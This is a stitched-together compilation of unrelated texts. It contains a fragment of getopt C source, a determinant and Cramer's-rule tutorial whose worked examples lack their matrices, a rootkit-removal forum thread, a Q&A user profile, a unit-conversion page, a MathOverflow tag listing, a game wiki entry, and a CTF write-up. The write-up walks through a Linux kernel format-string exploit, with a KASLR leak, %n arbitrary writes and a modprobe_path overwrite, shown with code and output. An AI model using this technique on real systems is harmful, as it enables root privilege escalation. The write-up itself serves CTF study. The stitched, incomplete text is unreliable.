				 * GNU extension:
				 * return non-option as argument to option 1
				 */
				optarg = nargv[optind++];
				return (INORDER);
			}
			if (!(flags & FLAG_PERMUTE)) {
				/*
				 * If no permutation wanted, stop parsing
				 * at first non-option.
				 */
				return (-1);
			}
			/* do permutation */
			if (nonopt_start == -1)
				nonopt_start = optind;
			else if (nonopt_end != -1) {
				permute_args(nonopt_start, nonopt_end,
					     optind, nargv);
				nonopt_start = optind -
				    (nonopt_end - nonopt_start);
				nonopt_end = -1;
			}
			optind++; /* process next argument */
			goto start;
		}
		if (nonopt_start != -1 && nonopt_end == -1)
			nonopt_end = optind;

		/*
		 * If we have "-" do nothing, if "--" we are done.
		 */
		if (place[1] != '\0' && *++place == '-' && place[1] == '\0') {
			optind++;
			place = EMSG;
			/*
			 * We found an option (--), so if we skipped
			 * non-options, we have to permute.
			 */
			if (nonopt_end != -1) {
				permute_args(nonopt_start, nonopt_end,
					     optind, nargv);
				optind -= nonopt_end - nonopt_start;
			}
			nonopt_start = nonopt_end = -1;
			return (-1);
		}
	}

	/*
	 * Check long options if:
	 *  1) we were passed some
	 *  2) the arg is not just "-"
	 *  3) either the arg starts with -- we are getopt_long_only()
	 */
	if (long_options != NULL && place != nargv[optind] &&
	    (*place == '-' || (flags & FLAG_LONGONLY))) {
		short_too = 0;
		if (*place == '-')
			place++; /* --foo long option */
		else if (*place != ':' && strchr(options, *place) != NULL)
			short_too = 1; /* could be short option too */

		optchar = parse_long_options(nargv, options, long_options,
					     idx, short_too);
		if (optchar != -1) {
			place = EMSG;
			return (optchar);
		}
	}

	if ((optchar = (int)*place++) == (int)':' ||
	    (optchar == (int)'-' && *place != '\0') ||
	    (oli = strchr(options, optchar)) == NULL) {
		/*
		 * If the user specified "-" and '-' isn't listed in
		 * options, return -1 (non-option) as per POSIX.
		 * Otherwise, it is an unknown option character (or ':').
		 */
		if (optchar == (int)'-' && *place == '\0')
			return (-1);
		if (!*place)
			++optind;
		if (PRINT_ERROR)
			warnx(illoptchar, optchar);
		optopt = optchar;
		return (BADCH);
	}
	if (long_options != NULL && optchar == 'W' && oli[1] == ';') {
		/* -W long-option */
		if (*place) /* no space */
			/* NOTHING */;
		else if (++optind >= nargc) { /* no arg */
			place = EMSG;
			if (PRINT_ERROR)
				warnx(recargchar, optchar);
			optopt = optchar;
			return (BADARG);
		} else /* white space */
			place = nargv[optind];
		optchar = parse_long_options(nargv, options, long_options,
					     idx, 0);
		place = EMSG;
		return (optchar);
	}
	if (*++oli != ':') { /* doesn't take argument */
		if (!*place)
			++optind;
	} else { /* takes (optional) argument */
		optarg = NULL;
		if (*place) /* no white space */
			optarg = place;
		/* XXX: disable test for :: if PC? (GNU doesn't) */
		else if (oli[1] != ':') { /* arg not optional */
			if (++optind >= nargc) { /* no arg */
				place = EMSG;
				if (PRINT_ERROR)
					warnx(recargchar, optchar);
				optopt = optchar;
				return (BADARG);
			} else
				optarg = nargv[optind];
		} else if (!(flags & FLAG_PERMUTE)) {
			/*
			 * If permutation is disabled, we can accept an
			 * optional arg separated by whitespace so long
			 * as it does not start with a dash (-).
			 */
			if (optind + 1 < nargc && *nargv[optind + 1] != '-')
				optarg = nargv[++optind];
		}
		place = EMSG;
		++optind;
	}
	/* dump back option letter */
	return (optchar);
}

/*
 * getopt --
 *	Parse argc/argv argument vector.
 *
 * [eventually this will replace the BSD getopt]
 */
int
getopt(int nargc, char * const *nargv, const char *options)
{
	/*
	 * We don't pass FLAG_PERMUTE to getopt_internal() since
	 * the BSD getopt(3) (unlike GNU) has never done this.
	 *
	 * Furthermore, since many privileged programs call getopt()
	 * before dropping privileges it makes sense to keep things
	 * as simple (and bug-free) as possible.
	 */
	return (getopt_internal(nargc, nargv, options, NULL, NULL, 0));
}

/*
 * getopt_long --
 *	Parse argc/argv argument vector.
 */
int
getopt_long(int nargc, char * const *nargv, const char *options,
	    const struct option *long_options, int *idx)
{
	return (getopt_internal(nargc, nargv, options, long_options, idx,
				FLAG_PERMUTE));
}

/*
 * getopt_long_only --
 *	Parse argc/argv argument vector.
 */
int
getopt_long_only(int nargc, char * const *nargv, const char *options,
		 const struct option *long_options, int *idx)
{
	return (getopt_internal(nargc, nargv, options, long_options, idx,
				FLAG_PERMUTE|FLAG_LONGONLY));
}

#endif /* REPLACE_GETOPT */
If a parallelogram is defined by two vectors a and b, then the area of the parallelogram is |a × b| = |a||b| sin θ, where θ is the angle between a and b.

If the vectors a and b are joined by a third vector c to form a solid shape, then the volume of the solid is the area of the base (which we may take to be the area of the parallelogram formed by a and b) multiplied by the height. The cross product a × b is perpendicular to both a and b, so it points in the direction of the vertical height. By taking the dot product of c with a × b and dividing by |a × b|, we obtain the component of c perpendicular to the base. This is the height of the parallelepiped. Multiplying by the base area |a × b| gives the volume:

V = |c · (a × b)|

This is illustrated below. If the vectors a, b and c all lie in the same plane, then they are linearly dependent, since three vectors in a two-dimensional space are linearly dependent. They all lie in the same plane and the height of the parallelepiped is zero. If a matrix is formed with its columns or rows consisting of the three vectors, the determinant of this matrix will be zero, since the vectors are linearly dependent.
Linear Equations: Solutions Using Determinants with Three Variables

The determinant of a 2 × 2 matrix is defined as follows:

    | a  b |
    | c  d |  =  ad − bc

The determinant of a 3 × 3 matrix can be defined in terms of 2 × 2 minor determinants. Each minor determinant is obtained by crossing out the first column and one row:

    | a1  b1  c1 |
    | a2  b2  c2 |  =  a1 | b2  c2 |  −  a2 | b1  c1 |  +  a3 | b1  c1 |
    | a3  b3  c3 |        | b3  c3 |       | b3  c3 |       | b2  c2 |

Example 1

Evaluate the following determinant. First find the minor determinants. The solution is

To use determinants to solve a system of three equations with three variables (Cramer's Rule), say x, y, and z, four determinants must be formed following this procedure:

1. Write all equations in standard form.
2. Create the denominator determinant, D, by using the coefficients of x, y, and z from the equations, and evaluate it.
3. Create the x-numerator determinant, D_x, the y-numerator determinant, D_y, and the z-numerator determinant, D_z, by replacing the respective x, y, and z coefficients with the constants from the equations in standard form, and evaluate each determinant.

The answers for x, y, and z are as follows:

    x = D_x / D,    y = D_y / D,    z = D_z / D

Example 2

Solve this system of equations, using Cramer's Rule.

Find the minor determinants. Use the constants to replace the x-coefficients. Use the constants to replace the y-coefficients. Use the constants to replace the z-coefficients.

The check is left to you. The solution is x = 1, y = −2, z = −3.

If the denominator determinant, D, has a value of zero, then the system is either inconsistent or dependent. The system is dependent if all the determinants have a value of zero. The system is inconsistent if at least one of the determinants, D_x, D_y, or D_z, has a value not equal to zero and the denominator determinant has a value of zero.
TechSpot is dedicated to computer enthusiasts and power users. Ask a question and give support. Join the community here, it only takes a minute.

Yet another sirefef victim
By peterpaleo · 21 replies · Aug 9, 2012

1. peterpaleo (Topic Starter): Like many others, I have a problem with the sirefef rootkit and a rolling Microsoft Security Essentials restart. This seemed like the place to go.

2. Broni (Malware Annihilator): Welcome aboard.

   Please observe the following rules:
   • Read all of my instructions very carefully. Your mistakes during the cleaning process may have very serious consequences, like an unbootable computer.
   • If you're stuck, or you're not sure about a certain step, always ask before doing anything else.
   • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
   • Never run more than one scan at a time.
   • Keep updating me regarding your computer's behavior, good or bad.
   • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
   • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in the malware removal forum.
   • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.

   What Windows version?

3. peterpaleo: I'm very sorry for having made this thread before reading the sticky. Unfortunately I used this computer for online banking and college forms, which means they might even have my SSN. Is it safe to back anything up before I reinstall Windows 7 64-bit Home Premium, or am I SOL?

4. Broni: Whatever you back up you have to scan before you put it back on the fresh install. Because you're infected with a rootkit, make sure you FORMAT the hard drive. If you don't format, the rootkit will still be there. Keep in mind that the regular recovery disks which are usually provided when you buy a computer do NOT format the hard drive. Call all your financial institutions right away and make them aware of your problem. Change all sensitive passwords right away using a GOOD computer.

5. peterpaleo: Okay. I'll do that. How do I reformat my hard drive? And if I have an OEM version of Windows 7, will Microsoft allow me to reuse my key in this case?

6. Broni:

7. peterpaleo: I have done a clean install. The files I backed up are on an external hard drive. How can I scan these files without compromising my computer?

8. Broni: Install Panda USB Vaccine, or BitDefender's USB Immunizer, on your computer to protect it from any infected USB device. Then you're safe to plug your external drive in. Make sure your Windows is updated, AV installed, firewall is up.

9. peterpaleo: I've installed the Panda USB Vaccine.

10. Broni: Yes.

11. peterpaleo: Sorry. I have my computer vaccinated.

12. Broni: That's fine.

13. peterpaleo: Okay. Is there a program that I can download to scan the USB drive for the rootkit?

14. Broni: Any AV program will do.

15. peterpaleo: Okay, I scanned it with AVG and it says it's entirely safe. I can't find any sort of way to dump a log, though.

16. Broni: I don't need it.

17. peterpaleo: Okay. I guess I'll install Malwarebytes and call it a day. Thank you so much, Broni. You are a saint.

18. Broni: You're very welcome.

19. peterpaleo: I just did some research and it turns out that sirefef may have created a hidden partition. Is there any way to check for this?

20. Broni: If you formatted the drive it's not an issue.

21. peterpaleo: I formatted it using the Windows CD, but I've read that the virus can insert itself into the MBR and create hidden partitions as well. Are you sure?

22. Broni: If you formatted the whole drive, not just one partition, you're fine.
plainclothes
Member for 11 years, 6 months · Last seen more than 4 years ago

Answers:
1 vote · Is it a good idea to expire passwords after a time relative to their complexity?
1 vote · What are the pro's and con's of an extended user session?
1 vote · Disable past dates or display error message?
1 vote · How to distinguish between fields with similar values and no labels?
1 vote (accepted) · What is best for register section labels? "Your email" or "Email"
1 vote · Where to put personalized recommendations feature?
1 vote (accepted) · Should the tap area be visible to users?
1 vote · Scrolling vs "view more" in comments / large text fields
1 vote · How to optimize the UX process for projects with tight deadlines?
1 vote · Best way to share from a Material design list
1 vote (accepted) · Naming convention for "admin" UI and "public facing" UI
1 vote · How can I test a user's decision to buy something?
1 vote · When should users be notified of a pending password expiration
1 vote · Frameworks for tagging user interview notes?
1 vote · Should I implement a "Tags to exclude" field?
1 vote · Is re-creating an art from someone else's art copyright violation and can be sued?
1 vote · Determine scenario for task or let user decide?
1 vote (accepted) · How to apply the Pareto principle in UX design
1 vote · In apartments or hotels why do we add a 0 between the floor number and room/apartment number?
1 vote · Will users misunderstand "Last week", "Last year", "Last month" etc?
1 vote · How does user's emotion relate to UX?
1 vote · Android design with two-tier (primary and secondary) navigation
1 vote · How to discourage users from using a feature?
1 vote · What do you call a heuristic evaluation?
1 vote (accepted) · How to overlay multiple sets of quantitative data on a network?
1 vote (accepted) · Should I use multiple synchronized dropdowns in a big UI
1 vote · Upload forms, should they open on a new page or in a pop-up box?
1 vote · Best way to represent multilevel multiselect location dropdown
1 vote · When conducting a tree test, is it ever okay to use keywords in the task that are present in the tree?
1 vote · What is the initial state of an application called?
GrabCON CTF 2021 - Paas [Pwn]

Paas was a kernel exploitation challenge during GrabCON CTF 2021 that only got a single solve (our own). We are given a tarball and SSH access to a remote server. The compressed archive contains a shell script (run.sh) to launch a virtual machine using qemu-system-x86_64, a bzImage (the VM's kernel), an initramfs directory (the VM's filesystem), and a file named printf.c.

The printf.c file contains the source of a Linux kernel module which registers a new system call with the number 548. This syscall accepts a single parameter, which is an array of strings; these will be used as parameters to what seems to be a regular printf function. We wrote the following program to test it:

```c
#include <unistd.h>

int main()
{
    char* args[] = {
        "s1 -> %s\n",
        "s2",
    };

    syscall(548, args);
}
```

We copy it to the user's home in the initramfs and we pack the new filesystem as instructed by the challenge author:

```sh
cd initramfs
find . | cpio -o -H newc > ../initramfs.cpio
cd ..
gzip < initramfs.cpio > initramfs.cpio.gz
rm -f initramfs.cpio
```

We start the VM, cd into the home directory and launch the program, which prints the expected string to standard output:

```
~ $ ./poc
s1 -> s2
```

Inspecting the source for the kernel module, there does not seem to be any input checking, which makes this a format string challenge, with the particularity of it being in kernel space. We can then use %s for arbitrary reads, and %n for arbitrary writes.

Before we read or write anything we must compute the kernel's base address, as it is randomized due to KASLR. We used the perf_event_open technique (implemented here) to do so. Once we have the kernel's base address, we can read or write any kernel structure by first computing its offset from the base address. Specifically, we are going to use a technique based on overwriting modprobe_path, as detailed here.
In order to get the address of modprobe_path we need to debug the Linux kernel with symbols. To get symbols we use vmlinux-to-elf to extract the ELF file from the bzImage file. Next, we need to enable remote debugging and disable KASLR in order for the symbols to match their intended addresses; we do so by adding the -s -S flags and changing the kaslr option to nokaslr in the qemu command:

```sh
qemu-system-x86_64 \
    -s -S \
    -m 256M -initrd initramfs.cpio.gz -kernel ./bzImage \
    -nographic -monitor /dev/null -append "kpti=1 +smep +smap nokaslr root=/dev/ram rw console=ttyS0 oops=panic paneic=1 quiet" 2>/dev/null
```

The -s flag opens port 1234 for remote debugging, while -S will instruct the VM to freeze on startup so we can attach our debugger. We use the following gdb script to connect to the VM:

```
# Get symbols
file client/kernel.elf

# Connect
target remote :1234

# Breakpoint on vulnerable syscall
# We obtain its name by forcing a kernel crash and observing the stack trace
# We can also grep /proc/kallsyms for `printf` inside the VM
b __do_sys_printf
```

We now modify our program to include the KASLR bypass technique mentioned above and again call the vulnerable syscall. Then, we launch qemu and gdb, type continue in gdb after hitting the VM freeze, and start our program:

```
~ $ ./exploit
[.] trying perf_event_open sampling ...
lowest leaked address: ffffffff8105612a
kernel base (likely): ffffffff81000000
```
*/ /* * Read a location as a string */ void arb_read(uintptr_t ptr) { char* args[3] = {}; args[0] = "%p -> %s\n"; args[1] = ptr; args[2] = ptr; syscall(548, args); } int main() { unsigned long addr = get_kernel_addr_perf(); unsigned long kernel_base, modprobe_path; if (!addr) return 1; kernel_base = addr & 0xfffffffffff00000ul; modprobe_path = kernel_base + 0x164ec60; printf("modprobe_path: "); arb_read(modprobe_path); return 0; } 1 2 3 4 5 6 ~ $ ./exploit [.] trying perf_event_open sampling ... lowest leaked address: ffffffffaac5612a kernel base (possible): ffffffffaac00000 kernel base (possible): ffffffffaa000000 0xffffffffac24ec60 -> /sbin/modprobe At this point all we need to do is to overwrite modprobe_path and follow the steps detailed in kernel exploitation link above. As previously mentioned, we use %n for arbitrary writes, as with any other format string attack. The %n token writes to a certain location the amount of bytes written by printf up to that point. For example, if we were to write the byte 50 to some address, we would use the following format string: %50c%hn; %50c writes 50 characters to standard out, and %hn writes the number of previously written bytes (50) to the location pointed by the next parameter. The h modifier writes the specified amount as a short int (2 bytes); since we are writing single-byte amounts, this conveniently null-terminates our string without needing to make an additionall call. All of these behaviors are documented in the printf documentation. Finally, these are the steps of our exploit: 1. Leak the kernel base address. 2. Create a script in /home/user/x which will copy the flag to our home and make it readable. 3. Create a dummy binary file in /home/user/dummy with four 0xff bytes. 4. Overwrite modprobe_path. 5. Try to execute the dummy binary file. 6. Read the flag. You can find the full exploit here. 1 2 3 4 5 6 7 8 9 ~ $ ./exploit [.] trying perf_event_open sampling ... 
lowest leaked address: ffffffffb0c93132 kernel base (possible): ffffffffb0c00000 kernel base (possible): ffffffffb0000000 0xffffffffb224ec60 -> /sbin/modprobe 0xffffffffb224ec60 -> /home/user/x /home/user/dummy: line 1: ����: not found GrabCON{pr1n7f_1n_k3rn3l-4_b4d_1d34?} This post is licensed under CC BY 4.0 by the author.
How to easily convert cm to feet and inches – what is 338 cm in feet and inches?

You can easily convert 338 centimeters to feet and inches online. However, this is not the only easy method available. You can use conversion charts or even convert manually using a calculator. You can also create an Excel sheet with converted values for easy comparison.

Before answering your conversion question, it is important to understand that 1 foot is equal to 30.48 cm, 1 foot is equivalent to 12 inches, and 1 inch is equal to 2.54 cm. Below, we have tabulated numerous values for you. We have also included an easy-to-use calculator for easy conversion. You can bookmark our site for future reference.

What is 338 centimeters in feet and inches?

338 cm ÷ 2.54 = 133.07 in; 133.07 in ÷ 12 = 11 ft with a remainder of 1.07 in. So 338 cm ≈ 11 ft 1.07 in.

Conversion chart for centimeters to inches:

Centimeters (cm); inches (")
1; 0.393701
2; 0.787402
3; 1.181103
4; 1.574804
5; 1.968505
6; 2.362206
7; 2.755907
8; 3.149608
9; 3.543309
10; 3.937010

Cm, in. and ft are among the most commonly used length measurement units. They are used for measuring, labeling, calculating and recording length, width, height, circumference, radius, et cetera. Kilometers and miles are more popular for measuring longer distances, while cm and ft are mostly used for measuring and recording small distances and spaces.
The tag has no wiki summary.

39 votes, 1 answer, 3k views
Are the primes normally distributed? Or is this the Riemann hypothesis?
Forgive my very naive question. I know next to nothing about number theory, but I'm curious about the state of the art on the distribution of primes. Let $\mathrm{Li}(x)$ be the offset logarithmic ...

24 votes, 0 answers, 2k views
When should we expect Tracy-Widom?
The Tracy-Widom law describes, among other things, the fluctuations of maximal eigenvalues of many random large matrix models. Because of its universal character, it obtained its position on the ...

17 votes, 0 answers, 498 views
Erdos-Kac for squarefree numbers
In its usual form, the Erdos-Kac Theorem states that if $f(n) : \mathbb{N} \rightarrow \mathbb{R}$ is a strongly additive function with $|f(p)| \le 1$ for all primes $p$, then $$\frac{|\{n \le x : ...

15 votes, 1 answer, 792 views
Riemann's $\zeta$ function and the uniform distribution on $[-1,0]$
http://math.stackexchange.com/questions/64566/riemanns-zeta-function-and-the-uniform-distribution-on-1-0 Stackexchange isn't getting really excited about this, so here it is. The $n$th cumulant of ...

14 votes, 5 answers, 1k views
A Normal Distribution Inequality
Let $n(x) = \frac{1}{\sqrt{2\pi}} e^{-\frac{x^2}{2}}$, and $N(x) = \int_{-\infty}^x n(t)dt$. I have plotted the curves of both sides of the following inequality. The graph shows that the following ...

14 votes, 0 answers, 642 views
On random Dirichlet distributions
Fix a dimension $d\ge2$. Let $Q_d$ denote the positive quadrant of $\mathbb{R}^d$, that is, $Q_d$ is the set of points $\mathbf{x}=(x_i)_i$ in $\mathbb{R}^d$ such that $x_i>0$ for every $i$. ...

13 votes, 2 answers, 388 views
A probability distribution in n dimensional space whose projection on any line is a uniform distribution?
Does there exist, for any natural $n$, a probability distribution in $\mathbb{R}^n$ whose projection on any line is a uniform distribution?

12 votes, 1 answer, 625 views
2/3 power law in the plane
I've recently come across a particular problem whose solution turns out to be a probability distribution given by $f(x) = \alpha \|x\|^{-2/3}$ in the unit disk in $\mathbb{R}^2$ and zero elsewhere (I ...

11 votes, 1 answer, 747 views
Does $P(X_1>X_2)$ and $P(X_1=X_2)$, where $X_1$ and $X_2$ are independent and Poisson distributed, uniquely determine the parameters?
Let $X_1$ and $X_2$ be independent Poisson distributed random variables with parameters $\lambda_1$ and $\lambda_2$, respectively. Let $a = P(X_1 > X_2)$ and $b = P(X_1 = X_2)$. Question: ...

10 votes, 2 answers, 430 views
A Conjecture on the Density of a subset of integers
Let $X$ denote the largest subset of odd integers with the property that every exponent in the prime factorization of any $x \in X$ belongs to $X$. The conjecture states that the density of $X$ among ...

10 votes, 1 answer, 631 views
Talagrand's concentration inequality with limited independence
Is there a version of Talagrand's concentration inequality known when the variables have limited independence? More precisely, let $F:\mathbb{R}^n \rightarrow \mathbb{R}$ be a $1$-Lipschitz convex ...

9 votes, 1 answer, 632 views
Montgomery's pair correlation function without RH?
In the theory of the Riemann zeta function, Montgomery's pair correlation function is defined as $$ F(\alpha) = \frac{1}{N(T)} \sum_{T < \gamma, \gamma' < 2T} T^{i \alpha (\gamma - \gamma')} ...

9 votes, 2 answers, 559 views
Random Trigonometric Polynomial
Let $t_{1},t_{2},\ldots, t_{n}$ be i.i.d. real Gaussian random variables of zero mean and variance one. Let $a_{1},a_{2},\ldots, a_{n}$ be positive and fixed real numbers and define the random ...

9 votes, 1 answer, 583 views
Generalized central limit theorem
I am looking for a generalized central limit theorem for non-square-integrable stationary sequences. More precisely, I suspect that when $(X_j)_{j\geqslant 1}$ is a stationary sequence such that $X_i$ ...

8 votes, 4 answers, 889 views
What structure is needed to define a Gaussian distribution on a given space?
In most textbooks, the normal distribution is defined on $\mathbb{R}^n$ by specifying its probability density function. This works perfectly well, but it isn't really amenable to generalisation. I'm ...

8 votes, 2 answers, 668 views
What is the most extreme set of 4 or 5 nontransitive n-sided dice?
A set of nontransitive dice is a set of dice whose face numbers are such that the relation "is more likely to roll a higher number than" is not transitive. (See wikipedia) For some sets, the ...

8 votes, 3 answers, 584 views
Maximum of the expectation of maximum of Gaussian variables
Suppose $X=(X_1,\ldots,X_n)$ is a Gaussian vector with each entry $X_i$ marginally distributed as $\mathcal{N}(0,1)$. Want to find out the possible maximum of $$\mathbb{E}\max_{1\le i\le n}|X_i|$$ and ...

8 votes, 3 answers, 513 views
A Variance-Tail Description for Continuous Probability Distributions
Start with a continuous probability distribution given by a density function f(x). Let X be a real random variable whose distribution is given by the probability distribution. I would like to ask ...

8 votes, 1 answer, 400 views
Algorithm to produce random number with a gamma distribution
I'd like to produce pseudo-random numbers with different distributions for a Monte Carlo simulation. I've got the Poisson distribution working nicely with an algorithm from Knuth. I'm having trouble ...

8 votes, 2 answers, 517 views
Concentration bounds for sums of random variables of permutations
I'm trying to find theorems regarding random variables derived from sampling permutations, specifically concentration bounds. As an example, let $X_i$ be the $\{0,1\}$-random variable that represents ...

8 votes, 2 answers, 584 views
Order statistics (e.g., minimum) of infinite collection of chi-square variates?
Hi everyone, this is my first time here, so please let me know if I can clarify my question in any way (incl. formatting, tags, etc.). (And hopefully I can edit later!) I tried to find references, ...

8 votes, 2 answers, 344 views
An extension of Gaussian Isoperimetry
The Gaussian isoperimetric inequality (Tsirelson, Sudakov, Borell) states that among all sets of given Gaussian measure in the n-dimensional Euclidean space, half-spaces have the minimal Gaussian ...

8 votes, 2 answers, 347 views
Entropy conjecture for distributions over $\mathbb{Z}_n$
Suppose we have two independent random variables $X$ (with distribution $p_X$) and $Y$ (with distribution $p_Y$) which take values in the cyclic group $\mathbb{Z}_n$. Let $Z = X + Y$, where the ...

7 votes, 4 answers, 327 views
Gaussian distributions as fixed points in some distribution space
I'm taking a course on topology and probability. Today, the professor remarked something along the lines of: If you look at the space of probability distributions with $0$ mean and variance $1$, ...

7 votes, 1 answer, 312 views
Probability density that minimizes the sample range
Let $\mathcal{F}$ denote the set of all "concave probability distributions" on the unit interval, that is, all functions $f:[0,1]\to \mathbb{R}$ such that $f$ is concave, $f(x)\geq 0$ for all $x\in ...

7 votes, 7 answers, 567 views
Semicircle law universality elsewhere
Wigner's semicircle distribution is: $$f(x)=\frac{1}{2 \pi}\sqrt{4-x^2}, \ \ -2\leq x\leq 2.$$ Under reasonable conditions, the rescaled eigenvalue density of random symmetric matrices $M_n$ follows ...

7 votes, 1 answer, 237 views
Transportation metric (AKA Earth-Mover's, Wasserstein, etc.) as "natural" / "induced"?
Context: Given a discrete finite metric space $X$ (in my case X={0,1}$^n$ with the Hamming/L$_1$ distance), I need to define the natural or canonical metric on the set of all probability distributions ...

7 votes, 2 answers, 224 views
A moment problem
Suppose $X, Y$ are two positive random variables such that $\mathbb{E}[X^\alpha] = \mathbb{E}[Y^\alpha]$ for all $\alpha \in (0, 1/2)$. It is also known that the first moment exists for each of them, ...

7 votes, 2 answers, 417 views
How to efficiently sample uniformly from the set of p-partitions of an n-set?
Let $n,p \in \mathbb{N}_+$ with $p \leq n.$ Let $\mathcal{P}$ denote the set of partitions of $\{1, \ldots, n\}$ into $p$ nonempty sets. How can I efficiently sample uniformly from $\mathcal{P}$?

7 votes, 1 answer, 372 views
Lower bound for $Pr[X\geq EX]$
Given n random variables, $X_1, ..., X_n$, each takes value 0 or $a_i \in[0, 1]$. $X = \sum_{i=1}^n X_i$ and $EX \geq 1$ is the expected value of $X$. Can we get a lower bound for $Pr[X \geq EX]$? It ...

7 votes, 1 answer, 121 views
Distribution of dropped objects
Consider small perfectly elastic spheres being dropped from a fixed height in R^3, bouncing and coming to rest on the horizontal R^2. Assuming a reasonable distribution of minor perturbations of the ...

7 votes, 1 answer, 213 views
Concentration of sum of powers of normals
Let $Z_1,Z_2,\ldots,Z_n$ be i.i.d. copies of a random variable $Z$ distributed as $\frac{1}{\sqrt{2}}X+i\frac{1}{\sqrt{2}}Y$ with $X$ and $Y$ independent standard Normal random variables ...

7 votes, 1 answer, 151 views
Distribution of entries of a doubly-sorted random matrix
Take an $n \times n$ random matrix whose entries are i.i.d. with uniform distribution in $[0,1]$. Look at the sums of the elements of each row and then permute the rows so that these sums form an ...

7 votes, 0 answers, 409 views
1-Wasserstein distance between two multivariate normals
The $p$-Wasserstein distance between two measures $\nu_1$ and $\nu_2$ on $X$ is given by ...

7 votes, 0 answers, 366 views
Inequality between incomplete beta and gamma functions; or when is the binomial distribution function above/below its limiting Poisson
Please note: this question was posted first (September 4) on math.stackexchange.com and then (September 16) on stats.stackexchange.com. It got no answers on either of those sites. Let the ...

6 votes, 5 answers, 732 views
Are these Two Definitions of "Uniformly Distributed" Equivalent?
For an article I am writing, I would like to know that two somewhat different looking conditions are in fact equivalent. Here is the setting. $X$ is a compact (and first countable) metric space and ...

6 votes, 1 answer, 578 views
Mean of i.i.d. Random Variables With No Expected Value
Let $X$ be an integer-valued random variable and let $X_n$ be the sum of $n$ independent realizations of $X$. I would like to understand the behavior of $X_n/n$ for large $n$ in some cases where $X$ ...

6 votes, 1 answer, 113 views
Is there an $\infty$ version of the Wasserstein distance between two distributions?
If I have two probability distributions $\mu$ and $\nu$ defined on $X$ and $Y$ respectively, then the $p$-th Wasserstein distance between the two of them is defined as $$W_p(\mu,\nu) = ...

6 votes, 1 answer, 255 views
Reference on (discrete) log-concave probability distributions
A discrete distribution $p$ over $\mathbb{N}$ is said to be log-concave if it satisfies the following conditions: The support of $p$ is a contiguous interval, i.e. $\exists a \leq b$ s.t. $p_i > ...

6 votes, 2 answers, 294 views
If Mean Residual Lifetime is approximately constant, Residual Lifetime is Approximately Exponential in a Strong Sense
Suppose the "mean residual lifetime," $\mathbb{E}[X-x|X≥x]$, is approximately constant for large $x$. Then, I believe that the conditional tail distribution is approximately exponential, in the sense ...

6 votes, 2 answers, 4k views
Sum of Squares of Normal distributions
Given $X_i \sim \mathcal{N}(\mu_i,\sigma_i^2)$, for $i = 1,\dots,n$, how does one find the distribution of $D = \sum_{i=1}^n X_i^2$? In the case that all the standard deviations are the same (i.e. ...
6 votes 2answers 266 views Small and large pieces of the plane, after countably many generic straight cuttings A delightful recent problem about disconnecting the plane by straight lines suggested me the following further question, that I can't resist to post. Let $\mathcal{F} $ be a countable family of ... 6 votes 1answer 1k views Probability distributions: The maximum of a pair of iid draws, where the minimum is an order statistic of other minimums? General question: What is the distribution for the maximum of 2 independent draws from cdf F(x), when we know that the minimum of those same two draws is the kth order statistic of the minimum of n ... 6 votes 2answers 142 views Geometric interpretation of the average of two independent Cauchy distributions Let me state two facts: (1) It is well known that if one takes a point uniformly distributed on the unit circle, and then takes it stereographic projection, the corresponding measure induced on the ... 6 votes 1answer 76 views Summability of ratios of moments a weight Recently, I encounter the following problem: Let $w$ be a probability density on $[0,1]$. Let mk be the $k$-th moment, i.e., $$m_k=\int_0^1t^kw(t)dt.$$ Under what condition can we have ... 6 votes 0answers 88 views Rate of Convergence of Compound Poisson Laws to Infinitely Divisible Laws It is known that every infinitely divisible random variable is the limit in law of a sequence of compound Poisson random variables (see for instance Theorem 1.2.18 of Lévy Processes and Stochastic ... 5 votes 1answer 1k views Convergence rate of the central limit theorem near the center of the distribution I'm looking for fast convergence rates for the central limit theorem - when we are not near the tails of the distribution. Specifically, from the general convergence rates stated in the Berry–Esseen ... 
5 votes 2answers 2k views Convergence of moments implies convergence to normal distribution I have a sequence $\{X_n\}$ of random variables supported on the real line, as well as a normally distributed random variable $X$ (whose mean and variance are known but irrelevant). I know that the ... 5 votes 2answers 115 views Finding joint probability from double marginals Consider three probability distributions in the form $p_1(y,z),p_2(x,z),p_3(x,y)$. When does a global joint probability $p(x,y,z)$ (possibly not unique) exist? The first compatibility condition to ... 5 votes 3answers 386 views Estimating the Variance of a Discrete Normal Distribution Let $f(x; \sigma) = \frac{1}{\sigma\sqrt{2\pi}}\cdot e^{-\frac{x^2}{2\sigma^2}}$ be the probability density function of a normal distribution $\mathcal{N}(0, \sigma^2)$. We consider a discrete normal ...
Jin'tulu (Age of Warscape Wiki)

Details:
- Leader: Chieftain Rhanakhed
- Playable: Yes
- Faction: The Arbiters
- Average Height: 6.4 ft
- Skin Colours: Green, Blue, Teal, Black
- Hair Colours: None (males), Black (females)
- Eye Colours: Red/Orange
- Distinctive Features: Horned tail, tall, snout, scales
- Languages: Jin'ti, English
- Life Span: 50 years
- Diet: Carnivorous

"Whenever you are in the Oozing Marsh, watch your step. Those Jin'tulu have some incredibly crafty fighting techniques. Plus, those spears really hurt." ~ Forgelord Feezlebor

The Jin'tulu are a primary species appearing in Age of Warscape and Age of Warscape: Origins. They are one of the ten dominant races on Uloff, and are most often found in Gaderon, specifically in the Oozing Marsh. The race specializes in unique battle techniques, such as "Ground Fighting", and in the use of powders and poisons in combat. It is currently led by Chieftain Rhanakhed, a powerful strategist and expert fighter. The Jin'tulu are allied with The Arbiters and are a playable species in that faction.

History

(Image: The Jin'tulu Emblem)

The Jin'tulu are said to have evolved from native reptiles about two thousand years ago. Within the Oozing Marsh and Northern Fjordinheim, the race built villages and began to flourish. They soon developed humanoid features, built larger cities, and developed tools and weapons. Leaders came to be chosen by a traditional public fight to the death: whoever won became the Chieftain of the race. This carried on until the early Humans came along. The Jin'tulu were interested in the newcomers and watched them build their civilizations. Impressed by the Humans' building skills, they came out of the marsh with a peace offering. The Humans were reluctant to accept the offering at first, but decided to welcome them, and the two peoples shared a great feast of traditional meals made by the Jin'tulu.
Unfortunately, the Humans brought only themselves and nothing for the feast. Luckily, the Jin'tulu did not mind, as there was plenty of food for both races. The two races formed an alliance and a mutual friendship, and became trade partners: the Humans traded armor, shields, weapons, food, and clothing, while the Jin'tulu traded poison, spears, clothing, helmets, and their traditional food.

Appearance

